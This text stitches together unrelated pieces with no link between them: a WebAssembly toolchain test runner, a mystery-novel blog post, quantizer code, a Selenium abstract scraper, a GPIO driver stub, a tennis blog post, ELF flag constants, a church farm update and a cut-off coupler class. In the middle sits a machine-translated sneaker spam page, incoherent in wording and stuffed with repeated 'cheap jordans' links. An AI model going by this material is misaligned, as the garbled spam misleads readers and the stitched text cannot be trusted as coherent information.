+ [t, '-o', 'a.wasm'] support.run_command(cmd) with open('a.wasm', 'rb') as output: index = output.read().find(b'dylink') print(' ', index) assert index == 11, 'dylink section must be first, right after the magic number etc.' def run_ctor_eval_tests(): print('\n[ checking wasm-ctor-eval... ]\n') for t in shared.get_tests(shared.get_test_dir('ctor-eval'), ['.wast', '.wasm']): print('..', os.path.basename(t)) ctors = open(t + '.ctors').read().strip() cmd = shared.WASM_CTOR_EVAL + [t, '-all', '-o', 'a.wat', '-S', '--ctors', ctors] support.run_command(cmd) actual = open('a.wat').read() out = t + '.out' shared.fail_if_not_identical_to_file(actual, out) def run_wasm_metadce_tests(): print('\n[ checking wasm-metadce ]\n') for t in shared.get_tests(shared.get_test_dir('metadce'), ['.wast', '.wasm']): print('..', os.path.basename(t)) graph = t + '.graph.txt' cmd = shared.WASM_METADCE + [t, '--graph-file=' + graph, '-o', 'a.wat', '-S', '-all'] stdout = support.run_command(cmd) expected = t + '.dced' with open('a.wat') as seen: shared.fail_if_not_identical_to_file(seen.read(), expected) shared.fail_if_not_identical_to_file(stdout, expected + '.stdout') def run_wasm_reduce_tests(): if not shared.has_shell_timeout(): print('\n[ skipping wasm-reduce testcases]\n') return print('\n[ checking wasm-reduce testcases]\n') # fixed testcases for t in shared.get_tests(shared.get_test_dir('reduce'), ['.wast']): print('..', os.path.basename(t)) # convert to wasm support.run_command(shared.WASM_AS + [t, '-o', 'a.wasm', '-all']) support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec -all ' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm', '--timeout=4']) expected = t + '.txt' support.run_command(shared.WASM_DIS + ['c.wasm', '-o', 'a.wat']) with open('a.wat') as seen: shared.fail_if_not_identical_to_file(seen.read(), expected) # run on a nontrivial fuzz testcase, for general coverage # this is very slow in ThreadSanitizer, so avoid it there if 'fsanitize=thread' not in str(os.environ): print('\n[ checking wasm-reduce fuzz testcase ]\n') # TODO: re-enable multivalue once it is better optimized support.run_command(shared.WASM_OPT + [os.path.join(shared.options.binaryen_test, 'signext.wast'), '-ttf', '-Os', '-o', 'a.wasm', '--detect-features', '--disable-multivalue']) before = os.stat('a.wasm').st_size support.run_command(shared.WASM_REDUCE + ['a.wasm', '--command=%s b.wasm --fuzz-exec --detect-features' % shared.WASM_OPT[0], '-t', 'b.wasm', '-w', 'c.wasm']) after = os.stat('c.wasm').st_size # This number is a custom threshold to check if we have shrunk the # output sufficiently assert after < 0.85 * before, [before, after] def run_spec_tests(): print('\n[ checking wasm-shell spec testcases... ]\n') for wast in shared.options.spec_tests: base = os.path.basename(wast) print('..', base) # windows has some failures that need to be investigated if base == 'names.wast' and shared.skip_if_on_windows('spec: ' + base): continue def run_spec_test(wast): cmd = shared.WASM_SHELL + [wast] output = support.run_command(cmd, stderr=subprocess.PIPE) # filter out binaryen interpreter logging that the spec suite # doesn't expect filtered = [line for line in output.splitlines() if not line.startswith('[trap')] return '\n'.join(filtered) + '\n' def run_opt_test(wast): # check optimization validation cmd = shared.WASM_OPT + [wast, '-O', '-all'] support.run_command(cmd) def check_expected(actual, expected): if expected and os.path.exists(expected): expected = open(expected).read() print(' (using expected output)') actual = actual.strip() expected = expected.strip() if actual != expected: shared.fail(actual, expected) expected = os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log') # some spec tests should fail (actual process failure, not just assert_invalid) try: actual = run_spec_test(wast) except Exception as e: if ('wasm-validator error' in str(e) or 'parse exception' in str(e)) and '.fail.' in base: print('<< test failed as expected >>') continue # don't try all the binary format stuff TODO else: shared.fail_with_error(str(e)) check_expected(actual, expected) # skip binary checks for tests that reuse previous modules by name, as that's a wast-only feature if 'exports.wast' in base: # FIXME continue run_spec_test(wast) # check binary format. here we can verify execution of the final # result, no need for an output verification # some wast files cannot be split: # * comments.wast: contains characters that are not valid utf-8, # so our string splitting code fails there # FIXME Remove reference type tests from this list after nullref is # implemented in V8 if base not in ['comments.wast', 'ref_null.wast', 'ref_is_null.wast', 'ref_func.wast', 'old_select.wast']: split_num = 0 actual = '' with open('spec.wast', 'w') as transformed_spec_file: for module, asserts in support.split_wast(wast): print(' testing split module', split_num) split_num += 1 support.write_wast('split.wast', module, asserts) run_opt_test('split.wast') # also that our optimizer doesn't break on it result_wast_file = shared.binary_format_check('split.wast', verify_final_result=False, original_wast=wast) with open(result_wast_file) as f: result_wast = f.read() # add the asserts, and verify that the test still passes transformed_spec_file.write(result_wast + '\n' + '\n'.join(asserts)) # compare all the outputs to the expected output actual = run_spec_test('spec.wast') check_expected(actual, os.path.join(shared.get_test_dir('spec'), 'expected-output', base + '.log')) def run_validator_tests(): print('\n[ running validation tests... ]\n') # Ensure the tests validate by default cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm'] support.run_command(cmd) cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm'] support.run_command(cmd) cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_export.wast'), '-o', 'a.wasm'] support.run_command(cmd, expected_status=1) cmd = shared.WASM_AS + ['--validate=web', os.path.join(shared.get_test_dir('validator'), 'invalid_import.wast'), '-o', 'a.wasm'] support.run_command(cmd, expected_status=1) cmd = shared.WASM_AS + ['--validate=none', os.path.join(shared.get_test_dir('validator'), 'invalid_return.wast'), '-o', 'a.wasm'] support.run_command(cmd) cmd = shared.WASM_AS + [os.path.join(shared.get_test_dir('validator'), 'invalid_number.wast'), '-o', 'a.wasm'] support.run_command(cmd, expected_status=1) def run_example_tests(): print('\n[ checking native example testcases...]\n') if not shared.NATIVECC or not shared.NATIVEXX: shared.fail_with_error('Native compiler (e.g. gcc/g++) was not found in PATH!') return # windows + gcc will need some work if shared.skip_if_on_windows('example'): return for t in shared.get_tests(shared.get_test_dir('example')): output_file = 'example' cmd = ['-I' + os.path.join(shared.options.binaryen_root, 't'), '-g', '-pthread', '-o', output_file] if not t.endswith(('.c', '.cpp')): continue src = os.path.join(shared.get_test_dir('example'), t) expected = os.path.join(shared.get_test_dir('example'), '.'.join(t.split('.')[:-1]) + '.txt') # build the C file separately libpath = shared.options.binaryen_lib extra = [shared.NATIVECC, src, '-c', '-o', 'example.o', '-I' + os.path.join(shared.options.binaryen_root, 'src'), '-g', '-L' + libpath, '-pthread'] if src.endswith('.cpp'): extra += ['-std=c++' + str(shared.cxx_standard)] if os.environ.get('COMPILER_FLAGS'): for f in os.environ.get('COMPILER_FLAGS').split(' '): extra.append(f) print('build: ', ' '.join(extra)) subprocess.check_call(extra) # Link against the binaryen C library DSO, using an executable-relative rpath cmd = ['example.o', '-L' + libpath, '-lbinaryen'] + cmd + ['-Wl,-rpath,' + libpath] print(' ', t, src, expected) if os.environ.get('COMPILER_FLAGS'): for f in os.environ.get('COMPILER_FLAGS').split(' '): cmd.append(f) cmd = [shared.NATIVEXX, '-std=c++' + str(shared.cxx_standard)] + cmd print('link: ', ' '.join(cmd)) subprocess.check_call(cmd) print('run...', output_file) actual = subprocess.check_output([os.path.abspath(output_file)]).decode('utf-8') os.remove(output_file) shared.fail_if_not_identical_to_file(actual, expected) def run_unittest(): print('\n[ checking unit tests...]\n') # equivalent to `python -m unittest discover -s ./test -v` suite = unittest.defaultTestLoader.discover(os.path.dirname(shared.options.binaryen_test)) result = unittest.TextTestRunner(verbosity=2, failfast=shared.options.abort_on_first_failure).run(suite) shared.num_failures += len(result.errors) + len(result.failures) if shared.options.abort_on_first_failure and shared.num_failures: raise Exception("unittest failed") def run_lit(): def run(): lit_script = os.path.join(shared.options.binaryen_bin, 'binaryen-lit') lit_tests = os.path.join(shared.options.binaryen_root, 'test', 'lit') # lit expects to be run as its own executable cmd = [sys.executable, lit_script, lit_tests, '-vv'] result = subprocess.run(cmd) if result.returncode != 0: shared.num_failures += 1 if shared.options.abort_on_first_failure and shared.num_failures: raise Exception("lit test failed") shared.with_pass_debug(run) TEST_SUITES = OrderedDict([ ('version', run_version_tests), ('wasm-opt', wasm_opt.test_wasm_opt), ('wasm-dis', run_wasm_dis_tests), ('crash', run_crash_tests), ('dylink', run_dylink_tests), ('ctor-eval', run_ctor_eval_tests), ('wasm-metadce', run_wasm_metadce_tests), ('wasm-reduce', run_wasm_reduce_tests), ('spec', run_spec_tests), ('lld', lld.test_wasm_emscripten_finalize), ('wasm2js', wasm2js.test_wasm2js), ('validator', run_validator_tests), ('example', run_example_tests), ('unit', run_unittest), ('binaryenjs', binaryenjs.test_binaryen_js), ('binaryenjs_wasm', binaryenjs.test_binaryen_wasm), ('lit', run_lit), ]) # Run all the tests def main(): all_suites = TEST_SUITES.keys() skip_by_default = ['binaryenjs', 'binaryenjs_wasm'] if shared.options.list_suites: for suite in all_suites: print(suite) return 0 for r in shared.requested: if r not in all_suites: print('invalid test suite: %s (see --list-suites)\n' % r) return 1 if not shared.requested: shared.requested = [s for s in all_suites if s not in skip_by_default] for test in shared.requested: TEST_SUITES[test]() # Check/display the results if shared.num_failures == 0: print('\n[ success! ]') if shared.warnings: print('\n' + '\n'.join(shared.warnings)) if shared.num_failures > 0: print('\n[ ' + str(shared.num_failures) + ' failures! ]') return 1 return 0 if __name__ == '__main__': sys.exit(main())
Something Good to Read: Welcome 2018! Reading plus a sparkler: a perfect year's-end combo. I wrapped up 2017 by staying up late to finish reading Glass Houses, the latest book in the series by Louise Penny featuring Chief Inspector Gamache. In this outing, Gamache is going all in on stopping drug trafficking. Trafficking which, this being a novel, just happens to be reaching an evil climax in his little village of Three Pines. But it's all good for us, the reader, who can enjoy being wrapped up in the web of mystery and suspense being spun by Louise Penny. Glass Houses was worth staying up late to read; and now I regret that it is over. That is just the kind of book that qualifies as highly recommended reading.
# Copyright (c) 2017 Elias Riedel Gårding # Licensed under the MIT License import numpy as np from scipy.interpolate import interp1d from scipy.signal import convolve import matplotlib.pyplot as plt from . import lloyd_max class Encoder: def __init__(self, sim, tracker): self.sim = sim self.tracker = tracker def encode(self, *msg): # Just encode it with Lloyd-Max # (pass it to channel encoder or digital channel) i = self.tracker.lm_encoder.encode(*msg) self.tracker.update(i) return (i,) def get_tracker(self): return self.tracker class Decoder: def __init__(self, sim, tracker): self.sim = sim self.tracker = tracker def clone(self): return self.__class__(self.sim, self.tracker.clone()) def decode(self, *msg): # Decode with the Lloyd-Max decoder # (receive from channel encoder or digital channel) x_est = self.tracker.lm_decoder.decode(*msg) # Update the distribution tracker assert len(msg) == 1 # One integer i = msg[0] self.tracker.update(i) return (x_est,) # Hikmet's code # Constants RESOLUTION=1<<7 class Distribution: def __init__(self, interval, pdf): self.interval=interval self.pdf=pdf self.is_hikmet = True @classmethod def bySamples(cls, x, fx): # Interpolate to get the pdf # Use logarithmic interpolation to preserve log-concavity dx=x[1]-x[0] fx=np.array(fx, dtype = float) / sum(fx) / dx Fx=np.cumsum(fx)*dx v1 = sum(1 for i in Fx if i < 1e-5) v2 = sum(1 for i in Fx if i < 1-1e-5) x=x[v1:v2] fx=fx[v1:v2] fx=np.array(fx, dtype = float) / sum(fx) / dx logfx=np.log(fx) logpdf=interp1d(x, logfx, kind='linear', bounds_error=False, fill_value=float('-inf')) pdf = lambda t : np.exp(logpdf(t)) return cls((x[0],x[-1]), pdf) def convolution(d1, d2): a1,b1 = d1.interval a2,b2 = d2.interval delta = max(b1-a1,b2-a2) / float(RESOLUTION) f1=[d1.pdf(i) for i in np.arange(a1,b1,delta)] f2=[d2.pdf(i) for i in np.arange(a2,b2,delta)] fx=convolve(f1, f2) x=[a1+a2+delta*i for i in range(len(fx))] return Distribution.bySamples(x, fx) def LM(distribution, n): # Some definitions maxiter=1<<10 N=RESOLUTION a,b = distribution.interval x=np.linspace(a,b,N) fx=np.array([distribution.pdf(i) for i in x]) fx[np.isnan(fx)]=0 dx=(b-a) / (N-1.) Fx=np.cumsum(fx)*dx index=lambda y: int(min(N-1, max(0, np.round((y-a) / float(dx))))) # Initialization c=np.zeros(n) p=np.array([x[int(i)] for i in np.round(np.linspace(0, N, num=n+1)[1:-1])]) # Loop error=1 iteration=0 while error > 0 and iteration<maxiter: iteration +=1 # centers from boundaries pin=[0]+[index(i) for i in p]+[N-1] for i in range(n): c[i]=sum(x[j]*fx[j] for j in range(pin[i],pin[i+1]+1))\ /sum( fx[j] for j in range(pin[i],pin[i+1]+1)) pin_temp=pin # boundaries from centers p=(c[:-1]+c[1:]) / 2. pin=[0]+[index(i) for i in p] + [N-1] error=sum(abs(pin_temp[i]-pin[i]) for i in range(n+1)) return ([a]+list(p)+[b],c) class DistributionTracker: """Keeps track of the distribution of the plant's state.""" def __init__(self, sim, n_levels, distr=None, lm_encoder=None, lm_decoder=None): self.sim = sim self.n_levels = n_levels if distr is None: assert lm_encoder is None and lm_decoder is None W = self.sim.params.W self.fw = Distribution((-10,10), lambda x : W * np.exp(-x**2 / 2.) / np.sqrt(2.0 * np.pi) )# pdf of w_t: N(0,W) with support (-10,10) self.distr = self.fw boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits) self.lm_encoder = lloyd_max.Encoder(boundaries) self.lm_decoder = lloyd_max.Decoder(levels, boundaries) else: assert lm_encoder is not None and lm_decoder is not None self.distr = distr self.lm_encoder = lm_encoder self.lm_decoder = lm_decoder # DEBUG self.distrs = [] def clone(self): new = self.__class__(self.sim, self.n_levels, self.distr, self.lm_encoder, self.lm_decoder) # DEBUG new.distrs = self.distrs[:] if hasattr(self, 'x'): new.x = self.x if hasattr(self, 'fx'): new.fx = self.fx if hasattr(self, 'w_x'): new.w_x = self.w_x if hasattr(self, 'w_fx'): new.w_fx = self.w_fx if hasattr(self, 'd1'): new.d1 = self.d1 if hasattr(self, 'fw'): new.fw = self.fw return new def update(self, i, debug_globals=dict()): A = self.sim.params.alpha L = self.sim.params.L(self.sim.t) x_hat = self.lm_decoder.decode(i) u = -L * x_hat lo, hi = self.lm_decoder.get_interval(i) lo = max(lo, self.distr.interval[0]) hi = min(hi, self.distr.interval[1]) self.d1 = Distribution((A*lo+u,A*hi+u), lambda x: self.distr.pdf((x-u) / float(A))) self.distr = Distribution.convolution(self.d1, self.fw) self.distrs.append(self.distr) # DEBUG # DEBUG: For inspecting the local variables interactively debug_globals.update(locals()) boundaries, levels = LM(self.distr, 2**self.sim.params.quantizer_bits) self.lm_encoder = lloyd_max.Encoder(boundaries) self.lm_decoder = lloyd_max.Decoder(levels, boundaries)
jordans for cheap -Followed by Nike, Air Jordan 1 Retro High "Rare Air" This time the network in two air Jordan 1 Retro High "thin air", orange, white, black, gray, white, black leather uppers provide lychee. Traditional models of air Jordan 1 Retro High difference is that Jordan 1 Retro High "thin air" in the use of air Qiao Danxin plate has been widely circulated in the local flag flying wing. It also follows the retro Nike used to display, it can be described as full of gimmicks. Feel good leather and vintage details, in fact, share amazing walk, it is learned two more later this year will be listed for sale, interested friends, you'd better pay close attention. cheap jordan shoes -Feelings Platinum Air Jordan 11 Low effect on the foot ! Feelings Platinum Air Jordan 11 Low effect on the foot ! This double platinum color Air Jordan 11 Low "White / Metallic Gold" Platinum popularity dazzling color, the difficulty is not low! 11 Generation is popular series is always the brand's most popular style, the classic historical background and beautiful shoe body contour, is so many fans regret follow. This time with the help of a low posture on stage, golden yellow patent leather is quite eye-catching display, with white leather outsole with Bing, indeed, people can not extricate themselves. cheap jordans online -2017 models Air Jordan 4 "Motorsports" 2017 models Air Jordan 4 "Motorsports" in-kind for the first time exposure! Michael Jordan's love for motorcycle are obvious, [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans online [/url] but Jordan Brand has also been the main fact to build the team through a theme color of the Air Jordan 4 "Motorsports". Born in 2006, this Air Jordan 4 "Motorsports" in white leather shoe body basis, the team's dark blue tones presented in more than highlight the vitality of Spike Lee Mars on the upper picture is also unique flavor! Engraved rumors will return in 2017, and today is the first kind of image exposure, followed by the display only. The gorgeous blue details! Air Jordan 4 Premium "Obsidian" on sale soon! As this year's Air Jordan 4 Premium third member, [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans [/url] which is a premium air Jordan 4 "obsidian" brings luxury to September 17! The same is gorgeous costumes transboundary luxury team in different directions and different densities covered car line texture, along with gold metal parts, solid backing on white shoes, laces and tongue tag other details to create high-quality leather, luxury not dead! Fade out of our sight Jordan Brand Women Plan "heiress set" [url=http://www.footsneakers.com/products/?Air-Jordan-I(1)-Retro-n504_p1.html ] cheap jordans for women [/url] recently brought us aj1 modeled on the Air Jordan 1 "heir." Shoes with a fine nylon fabric with an elegant light-colored leather, fresh and elegant aesthetic qualities will show you the most. it is reported that this pair of shoes designed for women to create will be officially on sale September 10, priced at $ 110. cheap jordans for sale -Air ordan 5 GS "Raptors" Jordan Brand released a new color of the air jordan 5 gs "Raptors", [url=http://www.footsneakers.com/products/?Air-Jordan-V-(5)-Retro-n5_p1.html ] cheap jordans for sale [/url] the shoes when Jordan war Raptors for color design inspiration by carbon black matte leather wrapped the body of the shoe, supplemented by details symbol of raptors red and purple embellishment, overall feeling cool strength of ten feet.The shoe is only available for sale GS version, but the maximum size of US9.5Y is equivalent to 275cm, is expected to be officially on sale in September 17th, priced at $140 dollars. Presumably a lot of shoes fan friends for 10 years ago this pair of air jordan 4 "pure Money$" remember! White shoe body relaxed delicate, with silver metallic decorative details, feel gorgeous directed at people!Before the exposure of the Air Jordan 7 . And front air Jordan 11 and Air Jordan 3 theme bedding, this air Jordan 12 "chocolate" sporting debut still brought profound fashion. Raw rubber outsole also queuing, chocolate-colored leather shoes, feel the energy, the trend is more subtle breathing. cheap jordans online -Female models Exclusive Air Jordan 4 GS "Deep Royal Blue" Female models Exclusive Air Jordan 4 GS "Deep Royal Blue" Four generations of familiar shoes Knight color reproduction, but appeared overwhelmed by Air Jordan 4 GS only bring a new color shoes. This pair of Air Jordan 4 GS "Deep Royal Blue" officially on sale, combined with white toe wrapped in a blue dotted gray background detail orange injection, [url=http://www.footsneakers.com/products/?Air-Jordan-IV(4)-Retro-n314_p1.html ] cheap jordans online [/url] knights style familiar atmosphere. Cool blue background brings a bright orange flash under contrasting decorative undoubtedly a girl AJ vitality share. cheap jordans for women -Air Jordan 12 GS "Dark Purple Dust" Girls Exclusive, Air Jordan 12 GS "Dark Purple Dust" It is reported that only the color GS shoes, priced at $ 140, is expected on sale this fall, currently no additional information to release, sister who might be interested a lot of attention. Bred classic black and red dress reproduced Air Jordan 1 Retro OG High, not only to the first year of 100% OG detail presented, the new lychee striae fine, plus prohibit prohibited topic lining wear, [url=http://www.footsneakers.com/products/?Air-Jordan-I-(1)-Retro-n1_p1.html ] jordans for cheap [/url] this pair of Air Jordan 1 "bred / ban "has become the focus! This heavy "double absolute" mystery, volume is unknown, but there are rumors that tens of thousands of people just twice the world! Shoes fans heart had been locked in a pair of black boots and red body! Today we bring near Mito tours, this classic black, feel more fashionable temperament! Will be available this September 3 Offer Air Jordan 1 Retro High OG "Bred" forbidden to wear color, [url=http://www.footsneakers.com/products/?Air-Jordan-I-(1)-Retro-n1_p1.html ] cheap jordans [/url] brought black and red and white shoes high specification litchi body,Clean white midsole and rubber outsole red, in classical style, while in a better texture to a new wearing experience. Has released official pictures, let us enjoy the next Westbrook Interpretation forbidden to wear charm. White Air Jordan Pure Money or series will return in the next year! Last seen in 2006, after a lapse of 10 years of "pure money" campaign or again, bring fresh vigor white dress! [url=http://www.footsneakers.com/products/?Air-Jordan-IV-(4)-Retro-n4_p1.html ] cheap jordans for sale [/url] DJ Folk broke the news, including the Air Jordan 4 "pure dollars," including three colors will be engraved in 2017, in addition to air and air Jordan 7 Jordan 13. Pure white in the details throughout, with silver accessories, shoes, white dress popular Air Jordan shoes is undoubtedly irresistible fresh magic!
from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0 from selenium.webdriver.support import expected_conditions as EC import time output = "/users/hundman/documents/data_science/hyspiri_search/facetview-hyspiri-public/agu/" driver = webdriver.Firefox() start = 50000 stop = 100000 with open(output + "index", "a") as out: found = 0 for num in range(start,stop): # try: driver.get("https://agu.confex.com/agu/fm15/meetingapp.cgi/Paper/" + str(num)) paper = None print str(num) try: load_time = 3 if num == start: load_time = 10 WebDriverWait(driver, load_time).until(EC.presence_of_element_located((By.CSS_SELECTOR, "section.item.People"))) time.sleep(3) content = driver.find_element_by_id("main") paper = True except: paper = False if paper == True: abstract = content.find_element_by_css_selector("section.item.Additional") abstract = abstract.text if len(abstract) > 1: found += 1 print "found: " + str(found) title = content.find_element_by_css_selector("li.itemTitle").text all_auths = "" auth_affils = "" authors = content.find_elements(By.CSS_SELECTOR, "li.RoleListItem") for auth in authors: affil = auth.find_element_by_tag_name("span").text all_auths += auth.find_element_by_tag_name("a").text + "::" + affil + "||" string = '{ "index" : { "_index" : "agu_2015", "_type" : "type1", "_id" : "%s" } }\n' %(num) out.write(string) doc = '''{"authors":"%s", "title":"%s", "abstract":"%s"} \n''' %(all_auths, title, abstract) out.write(doc.encode('utf-8')) # except: # print "issue with: " + str(cnt) # cnt += 1 print "found: " + str(found) out.write("\n") driver.close() #53876
Quiz: How much do you really know about collaboration? What are the benefits of collaboration for big brands? "I only came in for fish and chips, now I’m the digital marketer" Is collaboration the new competition?
from kervi.hal.gpio import IGPIODeviceDriver class GPIODriver(IGPIODeviceDriver): def __init__(self, gpio_id="generic_gpio"): IGPIODeviceDriver.__init__(self, gpio_id) pass def _get_channel_type(self, channel): from kervi.hal.gpio import CHANNEL_TYPE_GPIO, CHANNEL_TYPE_ANALOG_IN, CHANNEL_TYPE_ANALOG_OUT if channel in ["GPIO1", "GPIO2", "GPIO3"]: return CHANNEL_TYPE_GPIO elif channel in ["DAC1", "DAC2"]: return CHANNEL_TYPE_ANALOG_OUT elif channel in ["ADC1", "ADC2"]: return CHANNEL_TYPE_ANALOG_IN def _get_channel_names(self): return ["GPIO1", "GPIO2", "GPIO3", "DAC1", "DAC2", "ADC1", "ADC2"] @property def name(self): return "Generic GPIO" def define_as_input(self, pin, pullup=None, bounce_time=0): print("define pin in") def define_as_output(self, pin): print("define pin out") def define_as_pwm(self, pin, frequency, duty_cycle): print("define pwm") def set(self, pin, state): print("set pin", state) def get(self, pin): print("get pin") return 0 def pwm_start(self, channel, duty_cycle=None, frequency=None): print("start pwm") def pwm_stop(self, pin): print("stop pwm") def listen(self, pin, callback, bounce_time=0): print("listen rising") def listen_rising(self, pin, callback, bounce_time=0): print("listen rising") def listen_falling(self, pin, callback, bounce_time=0): print("listen falling")
Australian Open marks the beginning of the new tennis year and with this comes the ‘talk’ of the hopefuls of Australia’s tennis future. The recently completed “December Showdown’ put on display some of the tennis that we can expect from the next generation. The result was a little surprising, with the players you expect to step up didn’t and the evenness of competition, although tight, showed that ‘stand outs’ just didn’t eventuate. Players of similar fitness, speed, skills and unfortunately styles battled for a ‘wildcard’ and the major stepping stone to enhancing careers and greater expectations. The lessons of the past and generations that have succeeded and generations that have fallen seem to be ignored by this current crop. Whilst not being critical of their energy and passion, questions must be raised about a group of aspiring professionals and equipped with different physical attributes would ‘play’ the same. The ‘character’ (inner person) is missing from a game that continues, as history reminds, to be for all and many and varied. Play exercised to match the aggressive, or the passive, or the calm, or the volatile, or the planner, or the natural, or the creative, or the courageous ….. in other words ‘be yourself ‘ in order to succeed and turn dreams into reality. Australia has another new generation to follow the current one and these 16 year old’s have something very different and future modernism to their game / character. Vintage Tennis over 35 years has witnessed many fallen generations, this next one, we hope, has the fortitude and single bloody mindedness to be one of the successful generations. A thought to some of the past and present generations (current players aged 20 years to 28 years) – seek mentoring to guide a life that is there but needs to change …..too much talent, too much waste. This entry was posted in Blog and tagged Australian Open, Australian Tennis, successful generations, tennis players. Bookmark the permalink.
#------------------------------------------------------------------------------- # elftools: elf/constants.py # # Constants and flags, placed into classes for namespacing # # Eli Bendersky (eliben@gmail.com) # This code is in the public domain #------------------------------------------------------------------------------- class E_FLAGS(object): """ Flag values for the e_flags field of the ELF header """ EF_ARM_EABIMASK=0xFF000000 EF_ARM_EABI_VER1=0x01000000 EF_ARM_EABI_VER2=0x02000000 EF_ARM_EABI_VER3=0x03000000 EF_ARM_EABI_VER4=0x04000000 EF_ARM_EABI_VER5=0x05000000 EF_ARM_GCCMASK=0x00400FFF EF_ARM_RELEXEC=0x01 EF_ARM_HASENTRY=0x02 EF_ARM_SYMSARESORTED=0x04 EF_ARM_DYNSYMSUSESEGIDX=0x8 EF_ARM_MAPSYMSFIRST=0x10 EF_ARM_LE8=0x00400000 EF_ARM_BE8=0x00800000 EF_ARM_ABI_FLOAT_SOFT=0x00000200 EF_ARM_ABI_FLOAT_HARD=0x00000400 EF_MIPS_NOREORDER=1 EF_MIPS_PIC=2 EF_MIPS_CPIC=4 EF_MIPS_XGOT=8 EF_MIPS_64BIT_WHIRL=16 EF_MIPS_ABI2=32 EF_MIPS_ABI_ON32=64 EF_MIPS_32BITMODE = 256 EF_MIPS_NAN2008=1024 EF_MIPS_ARCH=0xf0000000 EF_MIPS_ARCH_1=0x00000000 EF_MIPS_ARCH_2=0x10000000 EF_MIPS_ARCH_3=0x20000000 EF_MIPS_ARCH_4=0x30000000 EF_MIPS_ARCH_5=0x40000000 EF_MIPS_ARCH_32=0x50000000 EF_MIPS_ARCH_64=0x60000000 EF_MIPS_ARCH_32R2=0x70000000 EF_MIPS_ARCH_64R2=0x80000000 class E_FLAGS_MASKS(object): """Masks to be used for convenience when working with E_FLAGS This is a simplified approach that is also used by GNU binutils readelf """ EFM_MIPS_ABI = 0x0000F000 EFM_MIPS_ABI_O32 = 0x00001000 EFM_MIPS_ABI_O64 = 0x00002000 EFM_MIPS_ABI_EABI32 = 0x00003000 EFM_MIPS_ABI_EABI64 = 0x00004000 class SHN_INDICES(object): """ Special section indices """ SHN_UNDEF=0 SHN_LORESERVE=0xff00 SHN_LOPROC=0xff00 SHN_HIPROC=0xff1f SHN_ABS=0xfff1 SHN_COMMON=0xfff2 SHN_HIRESERVE=0xffff class SH_FLAGS(object): """ Flag values for the sh_flags field of section headers """ SHF_WRITE=0x1 SHF_ALLOC=0x2 SHF_EXECINSTR=0x4 SHF_MERGE=0x10 SHF_STRINGS=0x20 SHF_INFO_LINK=0x40 SHF_LINK_ORDER=0x80 SHF_OS_NONCONFORMING=0x100 SHF_GROUP=0x200 SHF_TLS=0x400 SHF_COMPRESSED=0x800 SHF_MASKOS=0x0ff00000 SHF_EXCLUDE=0x80000000 SHF_MASKPROC=0xf0000000 class P_FLAGS(object): """ Flag values for the p_flags field of program headers """ PF_X=0x1 PF_W=0x2 PF_R=0x4 PF_MASKOS=0x00FF0000 PF_MASKPROC=0xFF000000 # symbol info flags for entries # in the .SUNW_syminfo section class SUNW_SYMINFO_FLAGS(object): """ Flags for the si_flags field of entries in the .SUNW_syminfo section """ SYMINFO_FLG_DIRECT=0x1 SYMINFO_FLG_FILTER=0x2 SYMINFO_FLG_COPY=0x4 SYMINFO_FLG_LAZYLOAD=0x8 SYMINFO_FLG_DIRECTBIND=0x10 SYMINFO_FLG_NOEXTDIRECT=0x20 SYMINFO_FLG_AUXILIARY=0x40 SYMINFO_FLG_INTERPOSE=0x80 SYMINFO_FLG_CAP=0x100 SYMINFO_FLG_DEFERRED=0x200 class VER_FLAGS(object): VER_FLG_BASE=0x1 VER_FLG_WEAK=0x2 VER_FLG_INFO=0x4
I write with an update on Bellwether Farm and its progress toward completion. The cold winter and wet spring caused a number of unexpected delays in construction, though this month's weather has allowed things to move forward productively. Most recently, delays in the fabrication of mechanical elements essential to fire suppression and other safety systems forced us to modify the Diocesan Episcopal Church Women Annual Meeting and a couple of other events scheduled for May and June. Nonetheless, all participants reported that their events were highly successful, even in their altered design. Because completion of all safety systems is required before occupancy permits can be issued, we have had to arrange alternative accommodations for St. Paul's, Cleveland Heights reading camp at a nearby scouting facility, though they will still have programming at Bellwether. The two weeks of Bellwether summer camp scheduled for mid-July, however, have had to be cancelled. While this is a disappointment to Camp Director Brandon Gooch and all who have been developing the camp program, it is essential that our facilities are safe and that construction on the site is complete before we initiate residential activities. Arrangements are being made to offer opportunities for those campers who had registered and their families to spend time at the farm later in the summer. Elsewhere about the farm, things are very busy. Around the barnyard, goats, sheep, and chickens have taken up residence, and the bees are busy making honey. Farm Manager Kyle Mitchell has extensive crops planted and an abundance of produce already harvested. Please come by to see what is growing and take some fresh vegetables home with you. It is beautiful at Bellwether this time of year, and there are many opportunities to volunteer and lend a hand. Don't hesitate to contact Kyle at (440) 533-5689, or Brandon at (662) 832-5696 if you'd like to spend some time helping out. They would be delighted to hear from you.
#!/usr/bin/env python # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # # <LicenseText> # # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # def coupler(name="coupler", facility="coupler"): return Coupler(name, facility) from pyre.components.Component import Component class Coupler(Component): def __init__(self, name, facility): Component.__init__(self, name, facility) self.exchanger = None return def initialize(self, solver): # exchanger could be either a FineGridExchanger (FGE) # or a CoarseGridExchanger (CGE) self.exchanger = solver.exchanger self.exchanger.initialize(solver) return def launch(self, solver): self.exchanger.launch(solver) return def initTemperature(self): ## # send initial temperature field from CGE to FGE ## self.exchanger.initTemperature() return def preVSolverRun(self): self.exchanger.preVSolverRun() return def postVSolverRun(self): self.exchanger.postVSolverRun() return def newStep(self): self.exchanger.NewStep() return def applyBoundaryConditions(self): self.exchanger.applyBoundaryConditions() return def 